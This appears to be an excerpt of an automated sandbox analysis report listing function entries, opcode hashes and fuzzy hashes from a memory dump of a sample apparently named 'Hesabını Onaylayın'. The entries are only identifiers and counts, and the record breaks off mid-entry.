                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /(i
                                                            • API String ID: 0-1904048125
                                                            • Opcode ID: 3a04f862d2511f05c6817e450acf63b8008eaa849211ceb2ef3e547c2588265a
                                                            • Instruction ID: e60f98ac0dfb60e677b98c86a41f87cf35baa6686ad38600d88f0a30396635e0
                                                            • Opcode Fuzzy Hash: 3a04f862d2511f05c6817e450acf63b8008eaa849211ceb2ef3e547c2588265a
                                                            • Instruction Fuzzy Hash: 5B910375E40118CFDF14DBA8D5945AEB7FAEFC9214F24856ED815AB354CB30AC02CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021943B0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 67ac95e0e7d855c5dd87983c54406c407e42812dfc81e527db92bdc4298cae5f
                                                            • Instruction ID: c1c3f1acae7e744cf810a7974afee068cf88013a569ea6d3b0ccbd4aea8c5855
                                                            • Opcode Fuzzy Hash: 67ac95e0e7d855c5dd87983c54406c407e42812dfc81e527db92bdc4298cae5f
                                                            • Instruction Fuzzy Hash: F6315634E01208DFCB18DFA9E880ADEBBB6BF8A304F509529E415B7354DB349942CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A3C6 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f19b46cd5e238a585f8c5e5fe6fff57f384eb39851ff8119a2d09b50a67095e2
                                                            • Instruction ID: 8ec808a593041a1bf855f4a2765025a58168fc1b1a9c6ed4efdba2196cc0bf9e
                                                            • Opcode Fuzzy Hash: f19b46cd5e238a585f8c5e5fe6fff57f384eb39851ff8119a2d09b50a67095e2
                                                            • Instruction Fuzzy Hash: 6581A6757402159FDF19DF68D848AAE7BF6BF89314F068428E8169B3A0CB30DC55CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02196220 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccdc167f5b40cd5d1230a846119f7b004a5f79c47f8216d5d67b2968bc149a4d
                                                            • Instruction ID: 859badbdb0d1099076f8db6a05c8b0ecd079f2256b46db03389dbce96d94c589
                                                            • Opcode Fuzzy Hash: ccdc167f5b40cd5d1230a846119f7b004a5f79c47f8216d5d67b2968bc149a4d
                                                            • Instruction Fuzzy Hash: C361FF307402918FCF29ABB4945877E76EAAFC9214F11882DE45ACB398DF74CC41C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A718 Relevance: .2, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fa8e8b80b93fffe794f28b1e8cb6b17e341d0cd72b2e21ae8d9f009eabeef9c
                                                            • Instruction ID: 3e3c78dfa21c7b08c9061f05e7102f2321990d220fc346ea3b2f2f51bce55f74
                                                            • Opcode Fuzzy Hash: 9fa8e8b80b93fffe794f28b1e8cb6b17e341d0cd72b2e21ae8d9f009eabeef9c
                                                            • Instruction Fuzzy Hash: 6D51B2317941118FCB18DF39D898A6ABBF9FF8964570644B9E416CB371EB21DC06CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02199AF0 Relevance: .1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b219b4ebe132a13ef8de866a5c1ae4e6987e9d884a864f8bc8c48f163f4e9003
                                                            • Instruction ID: aeae00657627f5240b5a78a33414bf3eb05eb06665ed900308b18da424501df4
                                                            • Opcode Fuzzy Hash: b219b4ebe132a13ef8de866a5c1ae4e6987e9d884a864f8bc8c48f163f4e9003
                                                            • Instruction Fuzzy Hash: 8E4113313402549FCF25DF68E858AAA3BE6EF89351F048469F80ACB351DB38DD11CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02198360 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45f1c5446400cfd1bc58449f6e4c8d1687d7ca02daceac85f96cb193e2ca6eae
                                                            • Instruction ID: aa0b5eb4754d76907bdacedb198b0241604be5ec2d29e837783732c816a32740
                                                            • Opcode Fuzzy Hash: 45f1c5446400cfd1bc58449f6e4c8d1687d7ca02daceac85f96cb193e2ca6eae
                                                            • Instruction Fuzzy Hash: B8310635B002148FCB149BB4D9587AE7BF6AF89210F054469E506DB390CF349D02CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021952E8 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8a8c007e2aabaa1e69d7952cf2b9c929f731f464a4dc2c044ce48a683879d34
                                                            • Instruction ID: b8711748af123f3b3b209490199b844b3f2e4a512edd43720a1ee1ad03af4f1c
                                                            • Opcode Fuzzy Hash: f8a8c007e2aabaa1e69d7952cf2b9c929f731f464a4dc2c044ce48a683879d34
                                                            • Instruction Fuzzy Hash: 1F315D35740109EFCF069FA5E858AAF7BA7FB88750F008418F9099B355CB749E61CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A958 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6780b96eddd2e45629f5dbe4f8625a3af1d560df0f6dfade03a25ccedf543450
                                                            • Instruction ID: 62146f50ea03584a14cba729945b80c5ba35eb03f4ca1a69967c387e27b1356f
                                                            • Opcode Fuzzy Hash: 6780b96eddd2e45629f5dbe4f8625a3af1d560df0f6dfade03a25ccedf543450
                                                            • Instruction Fuzzy Hash: 3F2124303842148BDF256A26995433E369BEFC5608F249039D906CF396EF79CC45C741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A230 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71d1dc95731ba93325ce26da55a1144568528343c2e9fc560bc4025261f0a077
                                                            • Instruction ID: 23a1902e9a67ac06d1fffb660d36fa1ce545aaada99984a0dae3bd1784c29f16
                                                            • Opcode Fuzzy Hash: 71d1dc95731ba93325ce26da55a1144568528343c2e9fc560bc4025261f0a077
                                                            • Instruction Fuzzy Hash: 8C31CE31380119EFCF06AF94E844AAE7BB6FF88350F108025F90587251CB36D925DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A860 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d22c51a1eecf5da981be69b80d73a925d4ab96f48557b7e5808ba1f0523bbcba
                                                            • Instruction ID: 4549d371e5c9ebd411a4d8d8a3b861a8a6b53644bca007d70d8718b9d2039b6f
                                                            • Opcode Fuzzy Hash: d22c51a1eecf5da981be69b80d73a925d4ab96f48557b7e5808ba1f0523bbcba
                                                            • Instruction Fuzzy Hash: 2B21B2307481599FDF05DF669880AAB7BF9FF89250F178826E852CB244DB30D949C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219646F Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03878c1fbf9a96c303e529a87975e1de2c64dad0ea6774c988f781c9edfaae41
                                                            • Instruction ID: 58210e0e2bb90324ee590756cd0496a2d0d2ce8caade7909741a547a0cf7a20d
                                                            • Opcode Fuzzy Hash: 03878c1fbf9a96c303e529a87975e1de2c64dad0ea6774c988f781c9edfaae41
                                                            • Instruction Fuzzy Hash: 382137347406109FCB289FA9D858A3B73AAEF857547058069E90ACB359CF34DC02CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021940D8 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b7f44f90f1956df0d9c9af6af6b2cdd65059b35fcd7dff2b1b0131e049c9f9a
                                                            • Instruction ID: 1c6c4ce235f3292717b2163c2aa506581ae5dcc5d598ba378870b870b6c9f87d
                                                            • Opcode Fuzzy Hash: 5b7f44f90f1956df0d9c9af6af6b2cdd65059b35fcd7dff2b1b0131e049c9f9a
                                                            • Instruction Fuzzy Hash: 5931E375D006188FDB18CFA6D8447EDBBF2AF89305F18C139D414AB298DB385586CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D0C3 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b7afc74962e612305ba9b853af5521c8372160b64be5e73b5d465f5074f44ce
                                                            • Instruction ID: e924b59b9ffb4eb1f1b03264a63331766df93892a86a620dbb1ab3d51d8c8270
                                                            • Opcode Fuzzy Hash: 4b7afc74962e612305ba9b853af5521c8372160b64be5e73b5d465f5074f44ce
                                                            • Instruction Fuzzy Hash: 1831D4B4E002099FCB44DFA9D5819AEBBF2FF88300F1094AAD818E7315D7749A42CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D0D0 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 339f92332fb9149e0728f1712f2f257f94413f259da66399ba517ef0a017ecda
                                                            • Instruction ID: deb50946980a965573b26d9f23079750d53697906939a7b3d6462e0c21e24cb9
                                                            • Opcode Fuzzy Hash: 339f92332fb9149e0728f1712f2f257f94413f259da66399ba517ef0a017ecda
                                                            • Instruction Fuzzy Hash: D631A4B4E002099FCB44DFAAD580AAEBBF2FF88300F20956AD818A7314D7749A41CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D1C8 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fb7e8c0662413d93d9fec067807830a8da09cbfef87b0030a51f0a708a9a01e
                                                            • Instruction ID: 42f32b08e3ac425c93a1f39ebbd5ec4e1116eed355c3f5385f4148097c9fc2ac
                                                            • Opcode Fuzzy Hash: 3fb7e8c0662413d93d9fec067807830a8da09cbfef87b0030a51f0a708a9a01e
                                                            • Instruction Fuzzy Hash: 942106B4E44209DFCB08DFA9D5849AEBBF1BF89200F11C5A9D418A7314E7349A41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02198350 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4446b434d32d6315d8acb7af452c3557046a5f9dfddbe06d4b0dc0d0b05f9f3
                                                            • Instruction ID: b4d915b1211b5c9b58a6feedb159a3fba3f8b10826b30fc1103cde6155c90f8c
                                                            • Opcode Fuzzy Hash: d4446b434d32d6315d8acb7af452c3557046a5f9dfddbe06d4b0dc0d0b05f9f3
                                                            • Instruction Fuzzy Hash: 1721B175B40214ABCB149FA4D948BDEBBF6FF8C710F11442AE901A7360DB719D10CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02197050 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39bd67de1e77c147cc106cc7e63cfe903901eb2e0f53e2a5ab4101568fd1d279
                                                            • Instruction ID: bd9ef1567d81f3292a2268d9513f08c8de4aad4627e4e7fcde41fda031a989d7
                                                            • Opcode Fuzzy Hash: 39bd67de1e77c147cc106cc7e63cfe903901eb2e0f53e2a5ab4101568fd1d279
                                                            • Instruction Fuzzy Hash: 80216D71910208DFCB24CF59D844FAABBF5FF48310F05846EE5198B291E775A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021952E6 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db4dc47b9e6485e4782b17beb7048d443934e9c1f137cb3bc6fabb05313679db
                                                            • Instruction ID: 7300bb0c04784129824de283082e0adf2180b853b8b19a48fac830010f6c0e7c
                                                            • Opcode Fuzzy Hash: db4dc47b9e6485e4782b17beb7048d443934e9c1f137cb3bc6fabb05313679db
                                                            • Instruction Fuzzy Hash: 19119071784208EFCB19AF69E859B6F37A6EB84710F408428F9099B355CB78DE51CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A221 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8335649e5f8d6102edf113977e9718b06ce8ef2425cf5fd276df91c839abe045
                                                            • Instruction ID: 8eec08ed13736f7bd9ecf1e00a975a68e0ed133f26626a42acd7f441843a2154
                                                            • Opcode Fuzzy Hash: 8335649e5f8d6102edf113977e9718b06ce8ef2425cf5fd276df91c839abe045
                                                            • Instruction Fuzzy Hash: 0211A031740219DFCF15EFA8E849BAA7BB5FF88754F108429F8058B201DB35C968CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219EEA8 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be7aee16eac024c78a4a341813506220c2606ac82d0121d6129fbb4132f2ad41
                                                            • Instruction ID: 7feadc0a7caf3cd385c6bcea9378029e0ee29a72de0e3e052389f8206fea6121
                                                            • Opcode Fuzzy Hash: be7aee16eac024c78a4a341813506220c2606ac82d0121d6129fbb4132f2ad41
                                                            • Instruction Fuzzy Hash: AC11F634E00108EFCB44DFA9C584A9EBBF6EF89200F15C8AAD418AB354DB349A51CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A328 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f59531e823de804a0f2c384ccc892fd42afc75c67fa8c183afb84a732433daf
                                                            • Instruction ID: f90856d64d832f6b6182cc242573cc0866082e435d80179baa87b50279601fa8
                                                            • Opcode Fuzzy Hash: 8f59531e823de804a0f2c384ccc892fd42afc75c67fa8c183afb84a732433daf
                                                            • Instruction Fuzzy Hash: 8101D4727805146FCB059E9CA814AEF7BEBEFC8B50F14842AF508D7244DB72991587D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219BAF0 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa1d9cec4825303ad8c8c3574b427ef051427a985651d9feef7b26e8d64680b1
                                                            • Instruction ID: dda6fc3ce36471894cd4e829f645452ff1d29bc5c773beb288e7562bf2092cbd
                                                            • Opcode Fuzzy Hash: aa1d9cec4825303ad8c8c3574b427ef051427a985651d9feef7b26e8d64680b1
                                                            • Instruction Fuzzy Hash: 5A01DF30E09204DFCB06DFB4E49925CBFB1EB89205F1484A6C40997258DB348B118B41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219BB00 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 903d027766160b2ffcf0f01be4e725dadc868a87682a3317920cd55b966d3959
                                                            • Instruction ID: 5c9ee3e04aea60bb673cef165163363049ce9a884c99c65e771187fa3cb95d96
                                                            • Opcode Fuzzy Hash: 903d027766160b2ffcf0f01be4e725dadc868a87682a3317920cd55b966d3959
                                                            • Instruction Fuzzy Hash: 09F08C34E59208DFCB05DFB5E55929DBFB6FB8920AF248465C40AA3248DB308B518B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219FA18 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d46f8dd8d41d1a9ebcb2a8c8492e471aa3dc587e5e78c578fbdb8ced16734ca
                                                            • Instruction ID: a483946c1450515e71b9644bcffaa26bc2dca581499948cc83b304796865d7bd
                                                            • Opcode Fuzzy Hash: 8d46f8dd8d41d1a9ebcb2a8c8492e471aa3dc587e5e78c578fbdb8ced16734ca
                                                            • Instruction Fuzzy Hash: BA0190B4D00249AFCB40DFA8D485AAEBFF4BB48201F5085AAD954E7341E7349A41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219C2D6 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0db3f266f46477ef63451340441f2472c8fee29248b43626b01f45727ed28500
                                                            • Instruction ID: ba3d581c70d534cba804c59cb9479211975307d6ec7d7a09db768a8938ae25a7
                                                            • Opcode Fuzzy Hash: 0db3f266f46477ef63451340441f2472c8fee29248b43626b01f45727ed28500
                                                            • Instruction Fuzzy Hash: F20148B0909204CFCB54CFA5CA84A8AFBF2FF89314F1091EAD018AB211C7308A41CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219DB2D Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1ec9d8bd263d0b2002b3817545c1c167dfbcf46ba0ad027efc45eac9ed2abdb
                                                            • Instruction ID: 7448dc1256310d86631004ffebcc0acf81e0df1e7e2825e75b5f9815b3bd6613
                                                            • Opcode Fuzzy Hash: c1ec9d8bd263d0b2002b3817545c1c167dfbcf46ba0ad027efc45eac9ed2abdb
                                                            • Instruction Fuzzy Hash: FC113978A05228CFCBA9CF68C981AD8BBF1FB49311F1041E9E909A7325D7359E91CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219C2B2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad759d156ee246ec97b656e930a0bbe1ad59c96cc0415de9effc816869b1d9a2
                                                            • Instruction ID: 5702b6daf6d6f419eda4b564ba473e2d6974fdd894a0f03c6db781855072c4db
                                                            • Opcode Fuzzy Hash: ad759d156ee246ec97b656e930a0bbe1ad59c96cc0415de9effc816869b1d9a2
                                                            • Instruction Fuzzy Hash: ADF01474D0A218CFDF54CFA9D99078DBBB2BB49310F10A1AAD118AB344D7744A81CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219C322 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a58d696773c78aeb0579c0edc4ce9df4eb489b2af16692fd1232927e642d3f7a
                                                            • Instruction ID: b535b5e3270620cec4e5d024041d495deb12a4bd7d17d09d3d3a705b9391e527
                                                            • Opcode Fuzzy Hash: a58d696773c78aeb0579c0edc4ce9df4eb489b2af16692fd1232927e642d3f7a
                                                            • Instruction Fuzzy Hash: 76F0B270E066288BEF54CFAA895078EBAF2BB88300F10C1A9D118AB354D6744B828F55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D9BA Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d9d31c5a11939ed26bb7c614ff1971486b7644b17b6b42fb194dfcc2f8035ae
                                                            • Instruction ID: 26c4c308bdd76c4d0ee35c1ed6367433a2336326614ef4ab086657389131584e
                                                            • Opcode Fuzzy Hash: 7d9d31c5a11939ed26bb7c614ff1971486b7644b17b6b42fb194dfcc2f8035ae
